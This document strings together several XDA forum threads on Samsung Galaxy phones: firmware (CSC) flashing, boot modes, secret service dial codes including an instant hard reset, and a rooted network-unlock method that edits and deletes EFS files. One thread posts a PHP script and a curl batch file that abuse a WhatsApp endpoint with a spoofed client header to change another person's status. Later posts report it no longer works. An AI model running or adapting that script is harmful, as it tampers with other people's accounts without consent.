[CSC] MULTI I9100OXXKE2 Download - Galaxy S II Android Development

Now i have extrakted the multi csc I9100OXXKE2
With
AUT
COS
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DBT
DCM
DNF
EUR
FWB
KOR
LUX
NEE
OMN
ORG
ORS
PAN
PLS
SEB
SUN
SWC
TMS
TPH
VDH
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fLASH WITH ODIN 1.85 WITHOUT REPARTITION AS PDA
USE PRECONFIG FOR CHANGE CSC
LINK:http://www.multiupload.com/BH7CLQRYSF
To use preconfig you need do have bettercut.apk or adb
for adb go in debug mode with your phone
open command in windows(adb folder)(shift right mouse open commandpromt here)
Then use following command
1. adb shell
2. am start -a android.intent.action.MAIN -n com.android.Preconfig/com.android.Preconfig.Preconfig
now your phone is in preconfig and you can select your csc
WARNING THIS WILl MAKE A FULL RESET OF YOUR PHONE!!!!!!!!

You could dial *#272*YOUR IMEI# to enter preconfig too, am I wrong?
Find your IMEI in Settings > About phone > Status.

Or by dialing *#06# (IMEI)

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[Q]Samsung galaxy ace S5830

The first sorry for my bad english.
Some tips of my galaxy ace rooted with superoneclick:
Downloading mode (for odin flash) : Volume down + home + power
Utility: Flash stock roms
RAMDump mode (ARM9 Mode): Volume up + home + power
Utility : ???
LK (Little kernel) mode (ver Mar 19 2011): Volume up + Volume down + power
Utility : ???
Emergency DLoad mode (ARM9 Mode): Volume up + Volume down + home + power
Utility : ???
My rom version is the last of samfirmwares:
PDA:S5830XXKC1
PHONE:S5839XXB1
CSC:S5830SERKB1
Stock rom files :
APBOOT_S5830XXKC1_CL963034_REV03_user_low_true.tar.md5 :
-arm11boot
-mibib
-oemsbl
-qcsbl
CODE_S5830XXKC1_CL963034_REV03_user_low_true.tar.md5
-boot.img
Dumped by splib_bootimg.pl :
boot.img-kernel
boot.img-ramdisk.gz , inside boot.img-ramdisk and inside some files.
-recovery.ing
Dumped by splib_bootimg.pl :
recovery.img-kernel
recovery.img-ramdisk.gz, inside recovery.img-ramdisk and inside some files.
-data.rfs
aeqcoe.txt
dump_enable
eqfilter.txt
lmfilter.txt
soundbooster.txt
srstunning.txt
data_test, inside some binaries
-system.rfs
This is a filesystem with app bin cameradata etc fonts lib media usr wifi xbin
CSC_S5830SERKB3_CL932584_REV03_user_low_true.tar.md5
-csc.rfs
recovery:
command
sec_csc.zip
This zip contain some apks and some t9 languages.
MODEM_S5830XXKB1_CL931744_REV03.tar.md5
-amss
Note : The csc file isn´t necesary , im tested only flashing the phone only with code and apboot files, the csc seems a apk tools of the telephone provider, in this version russian provider.The csc file wipe data and cache.
Manual deodex with this guide :
http://forum.xda-developers.com/showthread.php?t=765270
In this stock rom the android keyboard dissapear, only have a swipe keyboard.
Im try to backup all partitions of the phone using adb and dd but for example :
dd if=/dev/block/stl9 of=/sdcard/system bs=4096
Fail,all stX fail the copy.
Im try to modify manually the framework-res.apk to change the battery animation and this work good.
And i remove the animations and sounds of startup and shutdown and work good.
Some questions :
How to backup my phone in this moment and this cofiguration? How to create a custom rom for flashing and give my phone in this state with my custom configuration?
How to port a clockwork recovery in my galaxy ace?
How change the first samsung splash?

[INFO] Secret Dial codes

Fro the latest Froyo rom I could find the following Secret Dial Codes:
Code:
#7465625*27*# CP lock key input
#7465625*638*# Netwerk lock key input
#7465625*77*# SP lock key input
#7465625*782*# network subset key input
*7465625*27*# same but setup the locks
*7465625*638*#
*7465625*77*#
*7465625*782*#
*#*#28346#*#* audio tuning (stream, situation, soundbooster, equal)
*#0*# Tests (magnetic sensor calib,lcd,camera etc.)
*#0002*28346# ?
*#0002*28347# ?
*#0011# serv - wcdma
*#0228# batt stat
*#0283# serv - Audio loopback
*#0289# melody test
*#03# nand flash number
*#0368# FM radio
*#0599# ?
*#06# IMEI
*#0673# melody test
*#07# Test History
*#0782# PDA RTC Get (date)
*#0842# Vibrate test
*#1*# ?
*#1111# ser- wdcma
*#1234# version rom
*#12580*369# version pda
*#147852# ?
*#1575# serv - gps
*#197328640# serv - Main service menu
*#2222# serv - wdcma
*#2263# serv - band preference
*#22736224# acc sensor calib test
*#232331# BT rf test
*#232332# ?
*#232337# BT device address
*#232338# WLAN mac address
*#232339# WLAN tx / rx test
*#2424# ?
*#2454# RAM DUMP MODE
*#2580# serv - Integrity control on/off (efs?)
*#2663# Firmware version / update button
*#2664# Little blue line paint
*#272*
*#272886# ?
*#273283*255*3282*# Data create / sms
*#273283*255*663282*# Data create System / User space
*#2767*2878# serv - GPRS auto power on/off
*#279301# serv - RRC(HSPA) control
*#301279# serv - RRC(HSPA) control
*#3214789# GcfModeSettings enable/disable
*#3214789650# GpsSetup2
*#32489# serv - ciphering contr. on/off
*#3264# RAM version
*#3282*727336*# Data create overview
*#34971539# ?
*#367# ?
*#3695147# ?
*#369852# testApnSettings
*#4238378# serv - GCF
*#42663# Brightness
*#44336# Internal version Build/Changelist number
*#46744674# ?
*#4736767*738# Acc sensor Min/Max Calibr. enable
*#526# WLAN tx / rx test
*#528# WLAN tx / rx test
*#6854123# ?
*#6984125*# serv - ?
*#7263867*6633# Ramdump Enable/Disable
*#7284# serv - Diag config UART/USB
*#7298# ?
*#7353# Test menu melody/camera/accel.
*#7412365# ?
*#742690# ?
*#745# Sec_Ril_Dump Logs etc (generate random wifi mac address)
*#746# Svc_Dbg_Dump logs etc
*#7465625# Perso status (network/provider locks)
*#7594# Shutdown en/dis long Call End press
*#7780# Factory Reset question
*#865625# ?
*#872564# kills service mode app (?)
*#8736364# ?
*#9090# serv - Diag config UART/USB
*#9900# SysDump Logs RIL/DEBUG/ disable fast dormancy
*2767*3855# HARD RESET (no question asked !!)
*2767*4387264636# serv - sms test
*2767*738767 633# serv - sms to be sent...
*2767*738767 66# serv - sms set product code...
*2767*738767 7763# ...
*2767*738767 8378# ....
Cheers

[HOWTO] [root required] Remove network lock using nv_data.bin

DISCLAIMER
NB Same info as in thread by dagentooboy for Galaxy S unlock, which I used on the two Galaxy S' I owned and two others. Thanks should be sent on to them
NB I have seen the thread in Galaxy S II Original Android Development but that method adds too much complication
NB Tested on my Galaxy S II International which was network locked to Three
[PHONE MUST BE ROOTED]
To check if you have Network Lock type *#7465625# into phone dialer
1. Using root explorer or adb copy nv_data.bin and the md5 sum for that file from /efs
For adb or terminal emulator type:
su
cat /efs/nv_data.bin >> /sdcard/nv_data.bin
cat /efs/nv_data.bin.md5 >> /sdcard/nv_data.bin.md5
!!Keep a backup of these files!!
2. Using a hex editor go to hex address 181468 You should see FF 01 00 00 00
In order the blocks after FF are:
Network Lock
Network Subset Lock
SP Lock
CP Lock
3. The first block after FF with 01 is the network lock. Change this to 00
4. Delete nv_data.bin and the md5 for it. Put the edited nv_data.bin on sdcard root (KEEP YOUR BACKUP)
In adb or terminal emulator:
su
rm /efs/nv_data.bin
rm /efs/nv_data.bin.md5
cat /sdcard/nv_data.bin >> /efs/nv_data.bin
chmod 755 /efs/nv_data.bin
chown radio.radio /efs/nv_data.bin || chown 1001.1001 /efs/nv_data.bin
reboot
DONE
Thank you very much for this post - I am awaiting my UK 32gig SGS2 which I believe is locked to Orange UK - rooting it then following your instructions should be fairly straight forward. I have no idea what fw version it is likely to have - all I know is that its brand new, white and 32gig.
I took the plunge from my Desire HD so fingers crossed I will be happy with my decision to change!
Thanks again for your post...
No problem. Glad it was a help. Thought it should be posted in his forum as well as the same method that worked for the SGS1 works for the SGS2.
Congrats on the purchase. You'll love the phone. Have had mine for a few weeks and it's been great.
I have spend many hours going through XDA dev forums to prepare for the arrival of the SGS2 and I am still trying to work out what ROM to go for.
I recently moved to MIUI on the Desire HD and am really enjoying the difference between this and the HTC Sense bloat. I'm hoping that the extra screen and power of the SGS2 will make me prefer this device as the Desire HD is an old but well respected bit of kit.
The SGS2 looks simple enough to root so, hopefully, over the weekend I'll get it rooted unlocked and have a rom that I can start to tinker with.
Thanks again!
---------- Post added at 05:46 PM ---------- Previous post was at 05:44 PM ----------
http://forum.xda-developers.com/showthread.php?t=1064978&page=36
Incidentally, how does your method differ from the APKs that unlock the sim on these devices?
Rooting is very easy. Just get CF_ROOT for your firmware version. Chainfire has been making the best rooting kernels.
This method lets you do it yourself. The apps work but sometimes won't depending on the phone, not really sure why tbh, but didn't work on my phone so I used this method.
DISCLAIMER
NB Same info as in thread by dagentooboy for Galaxy S unlock, which I used on the two Galaxy S' I owned and two others. Thanks should be sent on to them
NB I have seen the thread in Galaxy S II Original Android Development but that method adds too much complication
NB Tested on my Galaxy S II International which was network locked to Three
[PHONE MUST BE ROOTED]
To check if you have Network Lock type *#7465625# into phone dialer
1. Using root explorer or adb copy nv_data.bin and the md5 sum for that file from /efs
For adb or terminal emulator type:
su
cat /efs/nv_data.bin >> /sdcard/nv_data.bin
cat /efs/nv_data.bin.md5 >> /sdcard/nv_data.bin.md5
!!Keep a backup of these files!!
2. Using a hex editor go to hex address 181468 You should see FF 01 00 00 00
In order the blocks after FF are:
Network Lock
Network Subset Lock
SP Lock
CP Lock
3. The first block after FF with 01 is the network lock. Change this to 00
4. Delete nv_data.bin and the md5 for it. Put the edited nv_data.bin on sdcard root (KEEP YOUR BACKUP)
In adb or terminal emulator:
su
rm /efs/nv_data.bin
rm /efs/nv_data.bin.md5
cat /sdcard/nv_data.bin >> /efs/nv_data.bin
chmod 755 /efs/nv_data.bin
chown radio.radio /efs/nv_data.bin || chown 1001.1001 /efs/nv_data.bin
reboot
DONE
but small confusion in hex edit
my model is I9100
country uk
carrier tmobile
for me i edit this address:
2. Using a hex editor go to hex address 18145C You should see FF 01 00 00 00
In order the blocks after FF are:
Network Lock
Network Subset Lock
SP Lock
CP Lock
3. The first block after FF with 01 is the network lock. Change this to 00
Not trying to flame or anything but all I did was download a free app from the market and it did all this for me, even backed up the efs!
= What are you even doing asking whether or not you should root your phone on XDA?! =
does this work on ics??? Thanks!
davidheffernan said:
DISCLAIMER
NB Same info as in thread by dagentooboy for Galaxy S unlock, which I used on the two Galaxy S' I owned and two others. Thanks should be sent on to them
NB I have seen the thread in Galaxy S II Original Android Development but that method adds too much complication
NB Tested on my Galaxy S II International which was network locked to Three
[PHONE MUST BE ROOTED]
To check if you have Network Lock type *#7465625# into phone dialer
1. Using root explorer or adb copy nv_data.bin and the md5 sum for that file from /efs
For adb or terminal emulator type:
su
cat /efs/nv_data.bin >> /sdcard/nv_data.bin
cat /efs/nv_data.bin.md5 >> /sdcard/nv_data.bin.md5
!!Keep a backup of these files!!
2. Using a hex editor go to hex address 181468 You should see FF 01 00 00 00
In order the blocks after FF are:
Network Lock
Network Subset Lock
SP Lock
CP Lock
3. The first block after FF with 01 is the network lock. Change this to 00
4. Delete nv_data.bin and the md5 for it. Put the edited nv_data.bin on sdcard root (KEEP YOUR BACKUP)
In adb or terminal emulator:
su
rm /efs/nv_data.bin
rm /efs/nv_data.bin.md5
cat /sdcard/nv_data.bin >> /efs/nv_data.bin
chmod 755 /efs/nv_data.bin
chown radio.radio /efs/nv_data.bin || chown 1001.1001 /efs/nv_data.bin
reboot
DONE
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simple and easy, since it took me few hour on seeking network code by using HEX-WORKSHOP, this took me just in few minutes, it's great... cheers!!!!
this is like a one click method for sim unlock S2 i9100p
http://forum.xda-developers.com/showthread.php?t=1360174
Even you can't get the unlock code - copy the patch file back, will work.
Tested with Galaxy S2 GT-i9100P
Orange UK
Thanks
Adnan
P.S. Sorry there will be few clicks
-edit and delated
sundar83 said:
DISCLAIMER
NB Same info as in thread by dagentooboy for Galaxy S unlock, which I used on the two Galaxy S' I owned and two others. Thanks should be sent on to them
NB I have seen the thread in Galaxy S II Original Android Development but that method adds too much complication
NB Tested on my Galaxy S II International which was network locked to Three
[PHONE MUST BE ROOTED]
To check if you have Network Lock type *#7465625# into phone dialer
1. Using root explorer or adb copy nv_data.bin and the md5 sum for that file from /efs
For adb or terminal emulator type:
su
cat /efs/nv_data.bin >> /sdcard/nv_data.bin
cat /efs/nv_data.bin.md5 >> /sdcard/nv_data.bin.md5
!!Keep a backup of these files!!
2. Using a hex editor go to hex address 181468 You should see FF 01 00 00 00
In order the blocks after FF are:
Network Lock
Network Subset Lock
SP Lock
CP Lock
3. The first block after FF with 01 is the network lock. Change this to 00
4. Delete nv_data.bin and the md5 for it. Put the edited nv_data.bin on sdcard root (KEEP YOUR BACKUP)
In adb or terminal emulator:
su
rm /efs/nv_data.bin
rm /efs/nv_data.bin.md5
cat /sdcard/nv_data.bin >> /efs/nv_data.bin
chmod 755 /efs/nv_data.bin
chown radio.radio /efs/nv_data.bin || chown 1001.1001 /efs/nv_data.bin
reboot
DONE
but small confusion in hex edit
my model is I9100
country uk
carrier tmobile
for me i edit this address:
2. Using a hex editor go to hex address 18145C You should see FF 01 00 00 00
In order the blocks after FF are:
Network Lock
Network Subset Lock
SP Lock
CP Lock
3. The first block after FF with 01 is the network lock. Change this to 00
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Click to collapse
The same for me I got 18145C and not 181468 but...Yersterday I was able to unlock it,then I uninstall the root flashing back the firmware brand A1 nad...the handy was back sim lock.Today I have done everything again,root,delated the two file,edited the bon file in line 18145C changeing 01 to 00 but...thi time nothing worked .My question is:Maybe I must delaate olsoo some .bak files?There is a different root that after,to unroot it ,I musent refash it?I think Is the falsh the problem (maybe).Any suggest?
Thank's
Helen
Thanks it work's for me with some different methode by my self.
Will this method work on any phone? I used it a few years ago on a galaxy gio, but now I need to unlock a galaxy grand prime, so I'm wondering if this is usable only on older devices. I'm asking without trying it myself because the phone in question is not mine, so I don't have it at the moment.
hi ... im trying to unlock samsung galaxy s3 sgh1747m.
i cant find the nv_data.bin file . anyone can help plz? where is this located?
in efs folder i can t see anything.
ty vm
T-Mobile Austria will remove own Locks for free.
Currently it is not success story, but may be it could helps to somebody.
I bought an old S2 with broken display as parts replacement for my phone. So, I swap mainboard and after succeed flashing of Android 7 I find out that network was locked.
S2 Spec:
Exactly similar Problem was found here.
Model > GT-I9100
Android-Version > 4.0.4
Band > I9100BOLP7
Kernel-Version > 3.0.15-1056084, [email protected]#3
Build > IMM76D.BOLPM
1. This tread does not help me, after reboot that was no Network code asked, but always shown "no SIM" instead.
2. I try this app, but it could not find any code for me.
3. I try app from Helroz and it manage to find some code, but shown me only � � � Symbols instead of the code...
4. I found this app. And after run it was saying that it could do the job for some EUR. However at the "Details" of the app I find out the MCC MNC code and check it here. I find out that it was belongs to T-Mobile Austria. After google it I found this and this FAQ. Based on last one I goes to support the via Chat. The offer me unlock code for 50 EUR, but after I point to the last FAQ, they ask me to use Web Contact to solve this issue. So, I also open a ticketed via Contact here. My point was that I bought phone on Ebay few days ago and based on information in last FAQ it should be unlocked for free. I attach screenshots of the Bills copies from Ebay and PayPal. And after 1 Hour I got an Email with Code.:laugh:
Unfortunately Phone is hanging on the "Requesting SIM Network unlock code" Message, seems I need to go back to stock Android first and try again...
At home a apply an old android 4.1.2 from Sammobile together with pit from here file was in "3 parts Firmware".
Android-Version > 4.1.2
Band > I9100BOLP9
Kernel-Version > 3.0.31-889555, [email protected] #3
Build > JZO54K:I9100WLSD
Basically if you boot directly after flash you will see password enter prompt, that"s because we are back from Android 7 to 4 and we need to boot into recovery mode and wipe everything that can be wiped under it. After this action phone will let you normally boot. During the boot I saw prompt to enter Network Lock Code. That was a time to check if it works:fingers-crossed:
After I entered code - it booted and works perfectly on Android 4.:laugh:
I will do upgrade back to the newest ROM, hope this Lock will never back.
Also I think that this tread solution could help if I knew about the lock before to flash it with Android 7, but only rooting instead.
Does this works for Samsung Galaxy Ace 3 S7275R ?
I just founded that this app work with S2 too, not just S1..
https://play.google.com/store/apps/details?id=com.helroz.galaxysunlock
Sent from my GT-I9100 using XDA Labs
no such file found ...but i have service its crazy .....any ideas? sm-g920p sprint on boost
can be work on J200F ?

[APP][WIN]WhatsApp Status Changer *Fool you friends*

http://whatsappstatus.net/
With this app you can change someones whatsapp status. Tried it and it worked.
The key is patience....
If someone likes to try it run it in a php script.
CC: CountryCode
ME: Phone number
S: Status
1.<?php
2.
3.$fields = array(
4. 'cc' => '31',
5. 'me' => '+31600000000',
6. 's' => 'Youre hacked'
7. );
8.
9.//url-ify the data for the POST
10.foreach($fields as $key=>$value) { $fields_string .= $key.'='.urlencode($value).'&'; }
11.rtrim($fields_string,'&');
12.
13.//open connection
14.$ch = curl_init();
15.
16.//set the url, number of POST vars, POST data
17.curl_setopt($ch,CURLOPT_URL,'https://s.whatsapp.net/client/iphone/u.php');
18.curl_setopt($ch,CURLOPT_POST,count($fields_string));
19.curl_setopt($ch,CURLOPT_POSTFIELDS,$fields_string);
20.curl_setopt($ch, CURLOPT_HTTPHEADER, array(
21. "User-Agent: WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)",
22. "Cache-Control: no-cache",
23. "Pragma: no-cache",
24. "Content-Type: application/x-www-form-urlencoded",
25. "Accept-Encoding: gzip, deflate",
26. "Accept-Language: en-us",
27. "Accept: */*"
28. ));
29.
30.//execute post
31.$result = curl_exec($ch);
32.
33.//close connection
34.curl_close($ch);
35.
36.print_r($result);
[APP][WIN]WhatsApp Status Changer
http://www.wiretrip.org/2012/01/12/how-whatsappstatus-net-works/
Update #3: WhatsApp implemented an IP check – so this doesn’t work as well as it used to. The check entails checking if the update-request is for a WhatsApp account currently signed in, and checks if it is coming from the same IP as the target client is using. This means above could should still work for target WhatsApp users behind the same NAT (for example).
Click to expand...
Click to collapse
How to use the status changer:
1. download the appropiate windows package of curl on http://curl.haxx.se/download.html
extract curl.exe to a certain folder
2. search for msvcr100.dll on C:\ and copy the newest occurence into the certain folder
(on my PC it was in a folder of Java)
3. make sure both your Phone with Whatsapp and your PC are in the same WLAN (they need to have the same IP), make sure Whatsapp is running on your phone (you need to be online)
4. run whatsapp_status.bat:
Code:
@ECHO OFF
:first
if not "%~1"=="" goto setnumber
echo Please enter your phone number (starting with +):
set /p number=
goto second
:setnumber
set number=%~1%
goto second
:second
if not "%~2"=="" goto setstatus
echo Please enter your new status:
set /p status=
goto exec
:setstatus
set status=%~2
goto exec
:exec
curl --data-urlencode cc="31" --data-urlencode me="%number%" --data-urlencode s="%status%" -A "WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)" -H "Accept: */*" -H "Accept-Language: en-us" -H "Accept-Encoding: gzip, deflate" -L -k -v https://s.whatsapp.net/client/iphone/u.php
alternatively run with variables:
whatsapp_status.bat "+491234567890" "new status "
Dosent work
DOSENT WORK ANYMORE!
https://youtu.be/u0zkAFyGDzA
:good:
*xXx* said:
DOSENT WORK ANYMORE!
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CSC-VFG-I9300XXUGNH4_I9300VFGGNH2.tar.md5 [Vodadone] ODIN Service Files!

Here are the STOCK GT-I9300 ODIN Service Files including PIT!
These "Files" are intended to be USED with only ODIN!
This is a MULTI-CSC Package and includes the Following CODES:
ATL, CNX, CYV, MOB, MTL, OMN, PRO, SFR, SIM, SWC, TCL, TOP, VD2, VDC, VDF, VDH, VDI, VDP, VDR, VIP, VOD, VOP.
CSC-VFG_I9300XXUGNH4_I9300VFGGNH2_2733769_REV00_user_low_ship.zip
Please hit the Thanks Button IF this helps YOU!! :silly:
And Here is the ODIN Software if you need it!
Odin3 v3.10.zip

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